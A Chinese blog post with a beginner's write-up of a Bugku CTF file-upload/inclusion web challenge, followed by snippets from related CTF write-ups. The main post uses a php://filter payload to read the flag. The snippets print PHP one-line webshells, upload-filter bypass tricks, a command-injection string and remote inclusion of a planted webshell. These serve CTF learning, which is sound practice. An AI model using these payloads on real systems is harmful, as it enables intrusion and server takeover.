bugku WEB文件上传2(湖湘杯)

最新推荐文章于 2025-11-16 12:21:27 发布
原创 最新推荐文章于 2025-11-16 12:21:27 发布 · 置顶 · 1.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

博主小丰在优快云开启首篇博客,记录网络安全学习之旅。目标逐步攻克Bugku平台web安全题目,首战解析上传漏洞,利用payload绕过限制获取flag,分享实战经验。

今天开始小丰的第一篇优快云博客,一来是觉得新鲜,玩玩,二来是想把自己在网络安全方面接触的各类东西给记下来,做个笔记,方便日后查看。

小丰技术比较菜,如果有想和小丰一起来飘的话,我也很开心,有一起学习的小伙伴那也是很好的助力。

这段时间想把bugku的web部分慢慢啃完,一步步的记录下来

今天玩的题目是

点击之后进入这个页面

刚开始的时候按着它的步骤来,上传图片,但是显而易见是不成功的

自己创建了一个1.png图像文件

刚开始接触,无从下手,还是看了别人的writeup,我们可以尝试构造payload来进行测试

php://filter/read=convert.base64-encode/resource=flag

得到的结果再在base64解码就可以得到flag了

注:payload不明白的话,可以自己百度一下

 

 

 

WaitZHP
关注
BugKu_文件上传
Kobalos的博客
09-16 858
直接访问目标地址,发现他给了一个上传点 看到他的提示让上传一个图片,不能上传php,那就先上传一个正常图片看看是什么样子的 可以看到上传成功后是直接给出上传后的地址的,并且还给出了超链接,那么来尝试一下上传木马 直接爆破后缀,失败,尝试绕过限制 讲请求包中的Content-Type: multipart/form-data,修改成Content-Type: Multipart/form-data(将m大写),再次爆破后缀名,发现php4上传成功了 掏出蚁剑尝试连接shell 成功getshel.
Bugku CTF_Web——文件上传
weixin_71914594的博客
11-13 1079
改成png也上传失败 应该校验了文件头。将Content-Type改大小写。把文件类型改成gif可以上传。再把文件后缀名改成php4。接下来就是找flag。
Bugku-Web题目-文件上传
最新发布
2401_86518996的博客
11-16 227
find / -name flag 2>/dev/null”(查找flag并忽略错误)此时再重新发包,就可以成功上传一句话木马,根据返回的路径打开蚁剑并连接。打开bp,并上传一个一句话木马上去(后缀名为jpg)此时显示上传成功,先将其发送到repeater模块。ultipart”并将文件后缀修改为php4。修改将“multipart”修改为““cd /”(回到根目录)连接成功后,打开虚拟终端。
bugkuweb32 文件上传
EC_Carrot的博客
12-24 1067
题目 题目进去后,是一个上传界面,题目也只提示了文件上传,就是考传shell。 然后做了一天,都没做出来,发现自己真的是太菜了!bugku也是刚开始更题,完全没有这道题的writeup,整个人都裂开。最后求助了一下大佬,才做出来的,到这里记录一下。 先放放一句话: <script language=php>eval($_POST['cmd']);</script> 跟普通的一句话没什么区别,但有一点非常奇妙的一点,它需要将这条头部Content-Type: multipart/fo
文件上传2(湖湘) bugku
weixin_45689999的博客
02-18 364
文件上传2(湖湘) 点开链接发现什么都没有 用御剑扫一下后台看看有没有隐藏文件 其他php文件打开都是空页,index.php打开没什么不一样,下载111.zip用phpstorm打开,得到flag 发现这就是个文件包含 看到别的大佬的wp是用构造payload 然后base64解码得到flag ...
bugku文件上传2(湖湘) 远程包含链接种马
zazazrt的博客
02-19 1321
我们可以在自己已经种马的远程的公网地址写这么一个文件 然后我们就可以骑马了http://123.206.87.240:9011/?op=http://123.206.87.240:8010/agf&amp;imagekey=7b94ef7c76bd383c4b7e39b17f86e9619f6370e9 只需要这么构造就行。然后上菜刀就行  ...
BugKu Web渗透之login2
cai_huaer的博客
09-02 394
7.于是猜测,flag是一个文件,继续回到之前的进程监控系统的页面,输入143.0.0.0 | cat flag > 6.txt,再去http://117.72.52.127:12643/6.txt页面查看,发现已经显示了flag。6.继续回到之前的进程监控系统的页面,输入143.0.0.0 | ls ./flag > 2.txt,再打开http://117.72.52.127:12643/2.txt 查看,并没有发现内容。必定返回最后数据,为 2,md5后的111。启动场景,进入页面,是一个登录页面。
Bugku Web专项(持续更新)
weixin_69065643的博客
07-30 596
点击网址访问网址,他让我们输入一个flag参数我们查看页面源代码他告诉我们有经常设置secret_key 变量可以知道要传入一个名为flag的参数,又说我们经常设置一个secret_key我们传入参数 /?得到flag进入网址和第一关一样,让我们输入一个flag参数,查看页面源代码没有什么有用的信息,我们看一下config。
bugku web32 文件上传
濯君
12-30 1825
打开实验,发现是文件上传 只能上传图像,不能上传PHP文件,那应该是寻找漏洞上传PHP文件 PHP文件里写入一句话木马 <?php @eval($_POST[caidao]);?> 使用burp抓包,不断尝试发现发现需要修改的地方有三个,一个是http head里的 Content-Type: multipart/form-data; multipart中的部分字母改成大写的。 第二个是文件的的Content-Type: application/octet-stream,改成image/j.
Bugku--文件上传】轻松拿flag
qq_62683583的博客
11-05 717
文件上传实现绕过拿flag
Bugku Writeup —文件上传2(湖湘)
diyuling2121的博客
11-04 288
我们先来看下题目,题目说明是文件上传 我们可以尝试通过构造payload来进行测试 php://filter/read=convert.base64-encode/resource=flag 获取到flag,之后进行解码,得到真正的flag 总结: 题目考察的是文件包含漏洞。 如果不懂payload意思的小伙伴可以自行百度一下 转载于:https://w...
bugku 文件上传2
小白渣的博客
09-16 488
这题打开发现是404 我是懵逼的 然后我就想用御剑扫一下后台 结果 咦~ 发现了一个zip文件 然后打开一看flag就在 这个文件中 好像有点简单~~
bugku web 文件上传2
m0_58189778的博客
08-19 850
题目:bugku 文件包含2 知识点:文件包含 工具:中国剑蚁 解题: 点开链接: 有点小炫酷的动画,除此之外没有什么信息,看一下源码: 发现注释中隐藏的upload.php,与题目的文件上传吻合了,现在思考怎么使用这个文件名,是直接访问还是如同默认页面一样,在file后传入文件名: 这里我们选择后者,比较幸运,成功了: 查看源码也并无玄机,看来应该到了上传文件的时候了。 文件上传通常需要我们做的是,上传一个恶意php脚本,然后我直接访问或者...
36_文件上传2
werdzs的博客
07-17 501
22
bugku 文件上传2(湖湘)
Superpig的博客
11-20 1789
分析 1、打开题目,题目里有两个链接 点击图片链接,发现没什么变化,点击第二个链接,发现要求上传一个png文件 2、按要求上传一个png文件发现fail 3、参考wp发现直接构造就可以 payload:?op=php://fillter/read=convert.base64-encode/rescource=flag 解释 看了wp才感悟到,op其实就是file,那为什么resource=f...
BugkuCtf中套路满满的题----------文件上传2(湖湘)
qq_42133828的博客
02-28 1884
这道题目说是文件上传,但经过小编实践证明,其实与文件上传是一点关系都没有的 首先,进入的界面这样子的: 仔细查看,有一段话是这样子的: 2017 © All rights reserved. 听说可以用菜刀!!! 为什么不试试dama.php dama或者b374k.php 听说蛮有用的。 看到这句话,是不是觉得上传的文件名称是dama.php或是b374k.php,但其实是白盒过滤了...
bugku-web-文件上传-个人笔记
sunquan705的博客
11-10 817
bugku-web-文件上传-个人笔记
文件上传2
weixin_34226706的博客
04-17 83
在如下过滤器中,上传文件中的content-type:multipart/form-data使用获取request.getParameter(key)无法获取相应的值。需要借助Spring框架中的CommonsMultipartResolver.resolveMultipart(HttpServletRequest request)将request转为MultipartHttpServletReq...
文件上传2
weixin_44728790的博客
10-14 139
import java.util.ArrayList; import java.util.Iterator; import java.util.List; public class SpliteWise { public static void main(String[] args) { String a="ahsdhfahsdfhiwuiegyrbabsdhfasohdbfajbofeihihq9389892y345hrlknlfklak;'q';fl;l;'kqwkejfjkbdsjfbksnk
bugku web Simple_SSTI_2
03-27
嗯,用户需要关于Bugku平台上Web题目Simple_SSTI_2的解决方案或详细信息。首先,我得回忆一下SSTI(服务器端模板注入)的基本概念。SSTI通常发生在使用模板引擎渲染用户输入时,如果未正确过滤输入,攻击者可以注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值